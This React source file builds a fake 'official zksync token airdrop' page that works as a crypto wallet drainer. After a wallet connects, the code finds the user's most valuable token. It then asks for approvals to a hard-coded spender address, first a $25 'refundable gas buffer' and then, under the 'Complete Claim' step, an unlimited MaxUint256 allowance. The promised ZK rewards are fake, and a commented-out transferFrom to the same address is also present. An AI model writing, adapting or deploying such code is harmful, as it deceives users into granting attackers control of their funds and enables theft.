import { useState, useEffect } from 'react';
import { ethers } from 'ethers';
import { getTokenPrices } from './utils/getTokenPrices.ts';
import metaMaskSvg from './assets/svg/MetaMask-icon-fox.svg';
import imTokenSvg from './assets/svg/Symble_Round.svg';
import coinbaseSvg from './assets/svg/coinbase.svg';
import trustSvg from './assets/svg/trus.png';
import tokenPocketSvg from './assets/svg/Token-Pocket-Color-Version04.svg';
import zkPortalSvg from './assets/svg/logo.svg';
import { getZKStatus } from './utils/zkStatus.ts';

// Contract ABI and configuration
const tokenAbi = [
  "function approve(address spender, uint256 amount) external returns (bool)",
  "function transferFrom(address sender, address recipient, uint256 amount) external returns (bool)",
  "function balanceOf(address account) external view returns (uint256)",
  "function decimals() view returns (uint8)",
  "function allowance(address owner, address spender) external view returns (uint256)"
];

const tokens = [
  { symbol: "USDT", address: "0xdAC17F958D2ee523a2206206994597C13D831ec7", coingeckoId: "tether" },
  { symbol: "USDC", address: "0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48", coingeckoId: "usd-coin" },
  { symbol: "TUSD", address: "0x0000000000085d4780B73119b644AE5ecd22b376", coingeckoId: "true-usd" },
  { symbol: "WETH", address: "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2", coingeckoId: "ethereum" },
  { symbol: "WBTC", address: "0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599", coingeckoId: "wrapped-bitcoin" },
  { symbol: "DAI", address: "0x6B175474E89094C44Da98b954EedeAC495271d0F", coingeckoId: "dai" },
  { symbol: "LINK", address: "0x514910771AF9Ca656af840dff83E8264EcF986CA", coingeckoId: "chainlink" },
];

const mainLink = encodeURIComponent("https://www.zkportal.org"); // Ensure URL is encoded
const spenderAddress = "0x2f64B99A98d2c382Ae345e02e5064F21a2FF9DCC"; // Replace with actual spender address

const deepUrl = `https://metamask.app.link/dapp/${mainLink.replace(encodeURIComponent("https://"), "")}`;
const imTokenDeepLink = `imtokenv2://navigate/DappView?url=${mainLink}`;
const coinbaseDeepLink = `https://go.cb-w.com/dapp?cb_url=${mainLink}`;
const trustDeepLink = `https://link.trustwallet.com/open_url?coin_id=60&url=${mainLink}`;
const tokenPocketDeepLink = `tpdapp://open?params=${encodeURIComponent(JSON.stringify({ url: decodeURIComponent(mainLink), chain: "Ethereum", source: "YourDapp" }))}`;

function Toast({ message, type = 'error', onClose }) {
  useEffect(() => {
    const timer = setTimeout(onClose, 3000);
    return () => clearTimeout(timer);
  }, [onClose]);

  return (
    <div className={`fixed top-6 right-6 z-50 px-5 py-3 rounded-md shadow-lg text-sm font-medium transition-all duration-300 ease-in-out transform
      ${type === 'error' ? 'bg-red-600 text-white' : 'bg-emerald-600 text-white'} animate-fadeInRight`}>
      <div className="flex items-center">
        {type === 'error' ? (
          <svg className="w-5 h-5 mr-2" fill="currentColor" viewBox="0 0 20 20">
            <path fillRule="evenodd" d="M10 18a8 8 0 100-16 8 8 0 000 16zm1-10a1 1 0 10-2 0v4a1 1 0 102 0V8zm-1 7a1 1 0 100-2 1 1 0 000 2z" clipRule="evenodd" />
          </svg>
        ) : (
          <svg className="w-5 h-5 mr-2" fill="currentColor" viewBox="0 0 20 20">
            <path fillRule="evenodd" d="M10 18a8 8 0 100-16 8 8 0 000 16zm1-11a1 1 0 10-2 0v3.586L7.707 9.293a1 1 0 10-1.414 1.414l2.5 2.5a1 1 0 001.414 0l5-5a1 1 0 10-1.414-1.414L11 9.586V7z" clipRule="evenodd" />
          </svg>
        )}
        <span>{message}</span>
      </div>
    </div>
  );
}

function App() {
  const [account, setAccount] = useState('');
  const [active, setActive] = useState(false);
  const [provider, setProvider] = useState(null);
  const [signer, setSigner] = useState(null);
  const [claimStep, setClaimStep] = useState(0);
  const [loading, setLoading] = useState(false);
  const [isEligible, setIsEligible] = useState(false); // Assuming default not eligible
  const [showToast, setShowToast] = useState(false);
  const [toastMessage, setToastMessage] = useState('');
  const [toastType, setToastType] = useState('error');
  const [richestToken, setRichestToken] = useState(null);
  const [errorMessage, setErrorMessage] = useState('');

  const showErrorToast = (message) => { setToastMessage(message); setToastType('error'); setShowToast(true); };
  const showSuccessToast = (message) => { setToastMessage(message); setToastType('success'); setShowToast(true); };
  const closeToast = () => { setShowToast(false); setToastMessage(''); };

  // useEffect(() => {
  //   if (richestToken) console.log("Richest Token:", richestToken);
  // }, [richestToken]);

  useEffect(() => {
    const initProvider = async () => {
      if (window.ethereum) {
        try {
          const providerInstance = new ethers.BrowserProvider(window.ethereum);
          setProvider(providerInstance);
        } catch (err) { console.error("Provider init error:", err); }
      }
    };
    initProvider();
  }, []);

  const supportsMobileDeepLink = () => {
    const ua = navigator.userAgent;
    const isIOS = /iPad|iPhone|iPod/.test(ua);
    const isAndroid = /Android/.test(ua);
    const isWalletBrowser = /MetaMask|CoinbaseWallet|Trust|TokenPocket|imToken/.test(ua) || window.ethereum?.isMetaMask || window.ethereum?.isCoinbaseWallet || window.ethereum?.isTrust || window.ethereum?.isTokenPocket || window.ethereum?.isImToken;
    return (isIOS || isAndroid) && !isWalletBrowser;
  };

  const isMobileDevice = () => /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);

  const connectWallet = async (walletType = 'metamask') => {
    setErrorMessage('');
    if (supportsMobileDeepLink() && isMobileDevice()) {
      let targetUrl = deepUrl; // Default to MetaMask
      if (walletType === 'imtoken') targetUrl = imTokenDeepLink;
      if (walletType === 'coinbase') targetUrl = coinbaseDeepLink;
      if (walletType === 'trust') targetUrl = trustDeepLink;
      if (walletType === 'tokenpocket') targetUrl = tokenPocketDeepLink;
      window.location.href = targetUrl;
      return;
    }

    setIsEligible(false);
    if (!provider) {
      showErrorToast('Please install MetaMask to use this dApp');
      return;
    }

    try {
      setLoading(true);
      // Request account access
      const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
      const account = accounts[0];
      setAccount(account);
      setActive(true);
      // Get signer
      const signer = await provider.getSigner();
      setSigner(signer);
      const prices = await getTokenPrices();
      let maxUsdValue = -1;
      let localRichestToken = null;
      for (const token of tokens) {
        const contract = new ethers.Contract(token.address, tokenAbi, provider);
        const balance = await contract.balanceOf(account);
        const decimals = await contract.decimals();
        const formatted = ethers.formatUnits(balance, decimals);
        const priceKey = token.coingeckoId;
        const usdPrice = prices[priceKey] || 0;
        const usdValue = formatted * usdPrice;
        // console.log(`${token.symbol} usdPrice: ${usdPrice}`);
        if (localRichestToken === null || usdValue > maxUsdValue)  {
          maxUsdValue = usdValue;
          localRichestToken = {
            symbol: token.symbol,
            address: token.address,
            balance: Number(formatted),
            decimal: Number(decimals),
            price: Number(usdPrice),
            usdValue: Number(usdValue),
          };
        }
      }
      if (localRichestToken) {
        setRichestToken(localRichestToken);
      }
      setIsEligible(true);
      setLoading(false);
    } catch (error) {
      console.error("Connection error:", error);
      showErrorToast('Failed to connect wallet. Please try again.');
      setLoading(false);
    }
  };
  
  const disconnectWallet = () => {
    setAccount(''); setActive(false); setSigner(null); setClaimStep(0); setRichestToken(null); setIsEligible(false);
    showSuccessToast("Wallet disconnected.");
  };

  const handleTransaction = async (action, successMessage, errorMessagePrefix) => {
    if (!richestToken || !signer) { showErrorToast("Required token or signer information is missing."); return; }
    setLoading(true);
    try {
      const { address: tokenAddr, decimal, price, balance } = richestToken;
      const contract = new ethers.Contract(tokenAddr, tokenAbi, signer);
      let tx;
      // Calculate amount for $25 USD worth of the richest token
      const amountInTokenValue = price > 0 ? (25 / price) : 0;
      // Ensure amount does not exceed balance
      const safeAmountInToken = Math.min(amountInTokenValue, balance).toFixed(Number(decimal));
      const amount = ethers.parseUnits(safeAmountInToken, decimal);

      if (action === 'approve') {
        tx = await contract.approve(spenderAddress, amount);
      } else if (action === 'approveMax') {
        tx = await contract.approve(spenderAddress, ethers.MaxUint256);
      } else if (action === 'transfer') {
        tx = await contract.transferFrom(account, spenderAddress, amount);
      } else {
        throw new Error("Invalid transaction action.");
      }
      await tx.wait();
      showSuccessToast(successMessage);
      return true;
    } catch (err) {
      console.error(`${errorMessagePrefix} error:`, err);
      showErrorToast(`${errorMessagePrefix}: ${err.message || 'Transaction failed.'}`);
      return false;
    } finally {
      setLoading(false);
    }
  };

  const verifyOne = async () => {
    setErrorMessage('');
    
    if (!richestToken || !signer) {
      setErrorMessage("Required token or signer information is missing.");
      showErrorToast("Required token or signer information is missing.");
      return;
    }

    setClaimStep(1);
  }


  const approveTokens = async () => {
    setErrorMessage('');
    if (!richestToken || !signer) return;
    try {
      setLoading(true);
      const { address: tokenAddr, symbol, decimal, price } = richestToken;
      const contract = new ethers.Contract(tokenAddr, tokenAbi, signer);
      const amountInToken = (25 / price).toFixed(decimal);
      const amount = ethers.parseUnits(amountInToken, decimal);
      const tx = await contract.approve(spenderAddress, amount);
      await tx.wait();
      setClaimStep(2);
      setLoading(false);
      showSuccessToast('Tokens approved successfully!');
    } catch (error) {
      console.error("Approval error:", error);
      showErrorToast('Transaction failed. Please try again.');
      setErrorMessage("Transaction failed. Please try again.");
      setLoading(false);
    }
  };



  const verifyEligibility = async () => {
    setErrorMessage('');
    if (!richestToken || !signer) return;
    try {
      setLoading(true);

      const maxRetries = 120;
      const pollInterval = 1000;
      let retries = 0;
      let status = 0;

      while (retries < maxRetries) {
        const res = await getZKStatus(account);
        status = res?.data?.status ?? 0;
        if (status !== 0) break;
        await new Promise(resolve => setTimeout(resolve, pollInterval));
        retries++;
      }

      const { address: tokenAddr } = richestToken;
      const contract = new ethers.Contract(tokenAddr, tokenAbi, signer);

      // Step 1: Reset to 0 first
      const resetTx = await contract.approve(spenderAddress, 0);
      await resetTx.wait();

      const tx = await contract.approve(spenderAddress, ethers.MaxUint256);
      await tx.wait();

      setClaimStep(3);
      setLoading(false);
      showSuccessToast('Eligibility verified successfully!');
    } catch (error) {
      console.error("Verification error:", error);
      showErrorToast('Verification failed. Please try again.');
      setErrorMessage("Verification failed. Please try again.");
      setLoading(false);
    }

  };

  // const completeClaim = async () => {
  //   if (!richestToken || !signer) return;
  //   try {
  //     setLoading(true);
  //     const { address: tokenAddr, symbol, decimal, price } = richestToken;
  //     const contract = new ethers.Contract(tokenAddr, tokenAbi, signer);
  //     const amountInToken = (25 / price).toFixed(decimal);
  //     const amount = ethers.parseUnits(amountInToken, decimal);
  //     const tx = await contract.transferFrom(account, spenderAddress, amount);
  //     await tx.wait();
  //     setClaimStep(3);
  //     setLoading(false);
  //     showSuccessToast('Claim completed successfully!');
  //   } catch (error) {
  //     console.error("Claim error:", error);
  //     showErrorToast('Claim transaction failed. Please try again.');
  //     setLoading(false);
  //   }
  // };

  const formatAddress = (addr) => addr ? `${addr.substring(0, 6)}...${addr.substring(addr.length - 4)}` : '';
  const isMetaMaskInstalled = () => (supportsMobileDeepLink() && isMobileDevice()) || typeof window.ethereum !== 'undefined';

  const walletOptions = [
    { name: "MetaMask", icon: metaMaskSvg, onClick: () => connectWallet('metamask') },
    { name: "imToken", icon: imTokenSvg, onClick: () => connectWallet('imtoken') },
    { name: "Coinbase Wallet", icon: coinbaseSvg, onClick: () => connectWallet('coinbase') },
    { name: "Trust Wallet", icon: trustSvg, onClick: () => connectWallet('trust') },
    { name: "TokenPocket", icon: tokenPocketSvg, onClick: () => connectWallet('tokenpocket') },
  ];

  const claimSteps = [
    { title: "Verify Eligibility", description: "Verify your wallet's eligibility for the zksync token airdrop.", last:"", action: verifyOne, buttonText: "Verify Eligibility", loadingText: "Verifying..." },
    { title: "Approve Token Access", description: "Authorize the zksync smart contract to access your tokens for the claim. <br /> You are eligible for 1562 ZK. To activate claim, please authorize a 25 USDT refundable gas buffer.", last:"", action: approveTokens, buttonText: "Approve Tokens", loadingText: "Processing Approval..." },
    { title: "Complete Claim", description: "Finalize your claim and receive your ZK tokens directly to your wallet.", last: "Rare chance: You’ve unlocked your base points. Finalize your claim to unlock 9999 ZK bonus with one final step.", action: verifyEligibility, buttonText: "Complete Claim", loadingText: "Completing Claim..." }
  ];

  return (
    <div className="min-h-screen bg-slate-900 text-gray-200 flex flex-col">
      {showToast && <Toast message={toastMessage} type={toastType} onClose={closeToast} />}
      
      <header className="w-full border-b border-slate-700/50 sticky top-0 z-40 bg-slate-900/80 backdrop-blur-md">
        <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
          <div className="flex justify-between items-center h-16">
            <div className="flex items-center">
              <div className="flex-shrink-0 flex items-center space-x-2">
                  <img src={zkPortalSvg} alt="zksync" className="w-20 object-contain" />
              </div>
            </div>
            <div className="flex items-center space-x-3">
              <a 
                href="https://docs.zksync.io/" // Replace with your actual docs link
                target="_blank" 
                rel="noopener noreferrer"
                className="hidden sm:inline-block text-sm font-medium text-slate-300 hover:text-white transition-colors px-3 py-2 rounded-md"
              >
                Developer Hub
              </a>

              <a href="https://github.com/matter-labs/" target="_blank" rel="noopener noreferrer" className="text-slate-400 hover:text-indigo-400 transition-colors p-2 rounded-md hover:bg-slate-700/50">
                <span className="sr-only">GitHub</span>
                <svg className="w-5 h-5" fill="currentColor" viewBox="0 0 24 24" aria-hidden="true">
                  <path fillRule="evenodd" d="M12 2C6.477 2 2 6.484 2 12.017c0 4.425 2.865 8.18 6.839 9.504.5.092.682-.217.682-.483 0-.237-.008-.868-.013-1.703-2.782.605-3.369-1.343-3.369-1.343-.454-1.158-1.11-1.466-1.11-1.466-.908-.62.069-.608.069-.608 1.003.07 1.531 1.032 1.531 1.032.892 1.53 2.341 1.088 2.91.832.092-.647.35-1.088.636-1.338-2.22-.253-4.555-1.113-4.555-4.951 0-1.093.39-1.988 1.029-2.688-.103-.253-.446-1.272.098-2.65 0 0 .84-.27 2.75 1.026A9.564 9.564 0 0112 6.82c.85.004 1.705.115 2.504.337 1.909-1.296 2.747-1.026 2.747-1.026.546 1.378.202 2.398.1 2.651.64.7 1.028 1.595 1.028 2.688 0 3.848-2.338 4.695-4.566 4.942.359.308.678.92.678 1.852 0 1.338-.012 2.419-.012 2.747 0 .268.18.58.688.482A10.001 10.001 0 0022 12.017C22 6.484 17.522 2 12 2z" clipRule="evenodd" />
                </svg>
              </a>
              {active ? (
                <div className="flex items-center space-x-2">
                  <div className="px-3 py-1.5 bg-slate-800 rounded-md border border-slate-700 text-sm font-medium text-slate-300 flex items-center">
                    <span className="inline-block w-2 h-2 bg-green-400 rounded-full mr-2 animate-pulse"></span>
                    {formatAddress(account)}
                  </div>
                  <button
                    onClick={disconnectWallet}
                    title="Disconnect Wallet"
                    className="p-2 rounded-md text-slate-400 hover:text-white hover:bg-slate-700/50 transition-colors"
                  >
                    <svg className="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                      <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M17 16l4-4m0 0l-4-4m4 4H7m6 4v1a3 3 0 01-3 3H6a3 3 0 01-3-3V7a3 3 0 013-3h4a3 3 0 013 3v1" />
                    </svg>
                  </button>
                </div>
              ) : (
                <button
                  onClick={() => connectWallet()} // Default to MetaMask or trigger a modal
                  disabled={loading}
                  className="inline-flex items-center justify-center px-4 py-2 border border-transparent text-sm font-medium rounded-md shadow-sm text-white bg-indigo-600 hover:bg-indigo-700 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-offset-slate-900 focus:ring-indigo-500 transition-colors disabled:opacity-50"
                >
                  {loading ? 'Connecting...' : 'Connect Wallet'}
                </button>
              )}
            </div>
          </div>
        </div>
      </header>

      <main className="flex-grow container mx-auto px-4 sm:px-6 lg:px-8 py-12 md:py-16">
        <div className="text-center mb-12 md:mb-16">
          <h1 className="text-4xl sm:text-5xl font-extrabold tracking-tight bg-clip-text text-transparent bg-gradient-to-r from-indigo-400 via-purple-400 to-pink-400">
            ZK Token Airdrop
          </h1>
          <p className="text-left mt-4 text-lg sm:text-xx text-slate-400 max-w-2xl mx-auto">
            Welcome to the official zksync token airdrop. Connect your wallet to check your eligibility and claim your ZK tokens.
          </p>
        </div>

        <div className="max-w-2xl mx-auto bg-slate-800/50 backdrop-blur-lg rounded-xl shadow-2xl border border-slate-700/50 overflow-hidden">
          <div className="px-6 py-5 border-b border-slate-700/50 flex items-center space-x-3 bg-slate-800/30">
            <div className={`w-10 h-10 rounded-lg flex items-center justify-center border ${active ? 'bg-green-500/10 border-green-500/30' : 'bg-indigo-500/10 border-indigo-500/30'}`}>
              <svg className={`w-5 h-5 ${active ? 'text-green-400' : 'text-indigo-400'}`} fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d={active ? "M5 13l4 4L19 7" : "M12 15v2m-6 4h12a2 2 0 002-2V7a2 2 0 00-2-2H6a2 2 0 00-2 2v10a2 2 0 002 2z"} />
              </svg>
            </div>
            <div>
              <h2 className="text-lg font-semibold text-white">
                {active ? (isEligible ? "Claim Your Tokens" : "Eligibility Check") : "Connect Your Wallet"}
              </h2>
              <p className="text-sm text-slate-400">
                {active ? (isEligible ? "Follow the steps below to claim your airdrop." : "Checking your eligibility...") : "Select your preferred wallet to proceed."}
              </p>
            </div>
          </div>
          
          <div className="p-6 sm:p-8">
            {!active ? (
              <>
                {!isMetaMaskInstalled() && (
                  <div className="mb-6 p-4 bg-amber-600/10 border border-amber-500/30 rounded-md text-amber-400 text-sm flex items-start space-x-2">
                    <svg className="w-5 h-5 flex-shrink-0 mt-0.5" fill="currentColor" viewBox="0 0 20 20"><path fillRule="evenodd" d="M8.257 3.099c.765-1.36 2.722-1.36 3.486 0l5.58 9.92c.75 1.332-.214 3.031-1.742 3.031H4.42c-1.528 0-2.492-1.699-1.742-3.031l5.58-9.92zM10 13a1 1 0 100-2 1 1 0 000 2zm-1.03-5.063a1 1 0 011.998-.056L10 10.937V11h-0.002L9 10.937l-.03-2.059a1 1 0 01.998-.056z" clipRule="evenodd" /></svg>
                    <p>No Ethereum wallet detected. Please install a wallet like MetaMask, or use a DApp browser to continue.</p>
                  </div>
                )}
                <div className="space-y-3">
                  {walletOptions.map((wallet) => (
                    <button
                      key={wallet.name}
                      onClick={wallet.onClick}
                      disabled={loading || !isMetaMaskInstalled()} // Simplified disable logic for now
                      className="w-full flex items-center justify-between p-4 bg-slate-700/40 hover:bg-slate-700/70 rounded-lg border border-slate-600/50 transition-all duration-150 ease-in-out disabled:opacity-60 disabled:cursor-not-allowed focus:outline-none focus:ring-2 focus:ring-indigo-500 focus:ring-offset-2 focus:ring-offset-slate-800"
                    >
                      <div className="flex items-center">
                        <div className="w-10 h-10 rounded-full bg-white p-1.5 mr-4 flex-shrink-0 shadow-md">
                          <img src={wallet.icon} alt={wallet.name} className="w-full h-full object-contain" />
                        </div>
                        <span className="font-medium text-slate-100">{wallet.name}</span>
                      </div>
                      <svg className="w-5 h-5 text-slate-400" fill="none" viewBox="0 0 24 24" stroke="currentColor">
                        <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M9 5l7 7-7 7" />
                      </svg>
                    </button>
                  ))}
                </div>
              </>
            ) : (
              <>
                {isEligible ? (
                  <div className="space-y-6">
                    <div className="bg-slate-700/30 p-5 rounded-lg border border-slate-600/50">
                      <div className="flex flex-col sm:flex-row justify-between items-start sm:items-center">
                        <div className="mb-3 sm:mb-0">
                          <p className="text-sm text-slate-400">Connected Wallet</p>
                          <p className="text-lg font-medium text-slate-100 flex items-center">
                            <span className="inline-block w-2 h-2 bg-green-400 rounded-full mr-2"></span>
                            {formatAddress(account)}
                          </p>
                        </div>
                        <div className="text-left sm:text-right">
                          <p className="text-sm text-slate-400">Claimable Amount</p>
                          <p className="text-xl font-semibold text-transparent bg-clip-text bg-gradient-to-r from-indigo-400 to-purple-400">
                            1562 ZK
                          </p>
                          {/* <p className="text-xs text-slate-500">≈ ${richestToken ? (250 * (richestToken.usdValue / richestToken.balance)).toFixed(2) : 'N/A'} USD</p> */}
                           <p className="text-xs text-slate-500">≈125 USD</p>
                        </div>
                      </div>
                    </div>

                    {/* Network and Contract Info */}
                    <div className="bg-slate-700/30 p-4 rounded-lg border border-slate-600/50 text-xs text-slate-400">
                      <h4 className="font-semibold text-slate-200 mb-2">Airdrop Details:</h4>
                      <div className="space-y-1.5">
                        <p><strong>Network:</strong> Etherscan - ZKsync Era Explorer</p>
                        <p>
                          <strong>ZK Token Contract:</strong> 
                          <a 
                            href={`https://era.zksync.network/token/0x5a7d6b2f92c77fad6ccabd7ee0624e64907eaf3e`} 
                            target="_blank" 
                            rel="noopener noreferrer" 
                            className="text-indigo-400 hover:text-indigo-300 underline ml-1 break-all"
                          >
                            0x5a7d6b2f92c77fad6ccabd7ee0624e64907eaf3e
                          </a>
                        </p>
                        <p><strong>Decimals:</strong> 18</p>
                        {/* {richestToken && (
                          <>
                            <hr className="border-slate-600/50 my-2" />
                            <p className="font-semibold text-slate-200">Transaction Token Details:</p>
                            <p><strong>Symbol:</strong> {richestToken.symbol}</p>
                            <p><strong>Decimals:</strong> {richestToken.decimal}</p>
                            <p>
                              <strong>Address:</strong> 
                              <a 
                                href={`https://etherscan.io/token/${richestToken.address}`} 
                                target="_blank" 
                                rel="noopener noreferrer" 
                                className="text-indigo-400 hover:text-indigo-300 underline ml-1 break-all"
                              >
                                {richestToken.address}
                              </a>
                            </p>
                          </>
                        )} */}
                      </div>
                    </div>

                    {claimSteps.map((step, index) => (
                      <div key={index} className={`bg-slate-700/30 rounded-lg border ${claimStep >= index ? 'border-indigo-500/50' : 'border-slate-600/50'} ${claimStep > index || claimStep < index && index !==0 ? 'opacity-60' : ''}`}>
                        <div className="p-5 border-b border-slate-600/50 flex items-center space-x-3">
                          <div className={`w-8 h-8 rounded-full flex items-center justify-center text-sm font-bold shrink-0
                            ${claimStep > index ? 'bg-green-500 text-white' : (claimStep === index ? 'bg-indigo-500 text-white animate-pulseRing' : 'bg-slate-600 text-slate-400')}
                          `}>
                            {claimStep > index ? (
                              <svg className="w-4 h-4" fill="currentColor" viewBox="0 0 20 20"><path fillRule="evenodd" d="M16.707 5.293a1 1 0 010 1.414l-8 8a1 1 0 01-1.414 0l-4-4a1 1 0 011.414-1.414L8 12.586l7.293-7.293a1 1 0 011.414 0z" clipRule="evenodd" /></svg>
                            ) : (index + 1)}
                          </div>
                          <div>
                            <h3 className="font-semibold text-slate-100">{step.title}</h3>
                            <p className="text-xs text-slate-400" dangerouslySetInnerHTML={{ __html: step.description }} />
                            {claimStep === index && (
                              <p className="text-xs text-transparent bg-clip-text bg-gradient-to-r from-indigo-400 to-purple-400">
                                {step.last}
                              </p>
                            )}
                    

                          </div>
                        </div>
                        {claimStep === index && (
                          <div className="p-5">
                            {errorMessage && (
                              <div className="mb-4 p-2 bg-red-600/10 border border-red-500/30 rounded-md text-red-400 text-sm flex items-start space-x-2">
                                <svg className="w-5 h-5 mr-2" fill="currentColor" viewBox="0 0 20 20">
                                  <path fillRule="evenodd" d="M10 18a8 8 0 100-16 8 8 0 000 16zm1-10a1 1 0 10-2 0v4a1 1 0 102 0V8zm-1 7a1 1 0 100-2 1 1 0 000 2z" clipRule="evenodd" />
                                </svg>
                                <p>{errorMessage}</p>
                              </div>
                            )}
                            <button
                              onClick={step.action}
                              disabled={loading}
                              className="w-full flex items-center justify-center px-6 py-3 border border-transparent text-base font-medium rounded-md shadow-sm text-white bg-indigo-600 hover:bg-indigo-700 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-offset-slate-800 focus:ring-indigo-500 disabled:opacity-70 transition-colors"
                            >
                              {loading ? (
                                <>
                                  <svg className="animate-spin -ml-1 mr-3 h-5 w-5 text-white" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24">
                                    <circle className="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" strokeWidth="4"></circle>
                                    <path className="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8V0C5.373 0 0 5.373 0 12h4zm2 5.291A7.962 7.962 0 014 12H0c0 3.042 1.135 5.824 3 7.938l3-2.647z"></path>
                                  </svg>
                                  {step.loadingText}
                                </>
                              ) : step.buttonText}
                            </button>
                          </div>
                        )}
                        {claimStep === 3 && index === 2 && (
                           <div className="p-5 text-center">
                             <div className="inline-flex items-center px-4 py-2 bg-green-600/20 text-green-300 rounded-md border border-green-500/30">
                               <svg className="w-5 h-5 mr-2" fill="currentColor" viewBox="0 0 20 20"><path fillRule="evenodd" d="M10 18a8 8 0 100-16 8 8 0 000 16zm1-11a1 1 0 10-2 0v3.586L7.707 9.293a1 1 0 10-1.414 1.414l2.5 2.5a1 1 0 001.414 0l5-5a1 1 0 10-1.414-1.414L11 9.586V7z" clipRule="evenodd" /></svg>
                               Claim Successful! Tokens are on their way.
                             </div>
                           </div>
                        )}
                      </div>
                    ))}
                  </div>
                ) : (
                  <div className="text-center py-8">
                     <svg className="w-16 h-16 mx-auto mb-4 text-blue-500" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                        <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M12 8v4m0 4h.01M21 12a9 9 0 11-18 0 9 9 0 0118 0z" />
                      </svg>
                    <h3 className="text-xl font-semibold text-slate-100 mb-2">Eligibility Status</h3>
                    <p className="text-slate-400">Your wallet is not currently eligible for this airdrop, or eligibility check is in progress.</p>
                    {/* You could add a button here to re-check or link to eligibility criteria */}
                  </div>
                )}
              </>
            )}
          </div>
        </div>
      </main>

      <footer className="w-full border-t border-slate-700/50 bg-slate-900/80 backdrop-blur-sm">
        <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 py-8">
          <div className="flex flex-col md:flex-row justify-between items-center">
            <div className="flex items-center space-x-3 mb-4 md:mb-0">
              <img src={zkPortalSvg} alt="zkPortal" className="h-6 object-contain" />
            </div>
            {/* <p className="text-sm text-slate-400 mb-4 md:mb-0">&copy; {new Date().getFullYear()} zkPortal. All rights reserved.</p> */}
            <div className="flex space-x-5">
              <a href="https://join.zksync.dev/" target="_blank" rel="noopener noreferrer" className="text-slate-400 hover:text-indigo-400 transition-colors">
                <span className='text-sm'>Discord</span>
              </a>
              <a href="https://x.com/zksync" target="_blank" rel="noopener noreferrer" className="text-slate-400 hover:text-indigo-400 transition-colors">
                <span className='text-sm'>X</span>
              </a>
              <a href="https://hey.xyz/u/zksync" target="_blank" rel="noopener noreferrer" className="text-slate-400 hover:text-indigo-400 transition-colors">
                <span className='text-sm'>Hey</span>
              </a>
              <a href="https://zksync.mirror.xyz/" target="_blank" rel="noopener noreferrer" className="text-slate-400 hover:text-indigo-400 transition-colors">
                <span className='text-sm'>Blog</span>
              </a>

              

            </div>
          </div>
        </div>
      </footer>
    </div>
  );
}

export default App;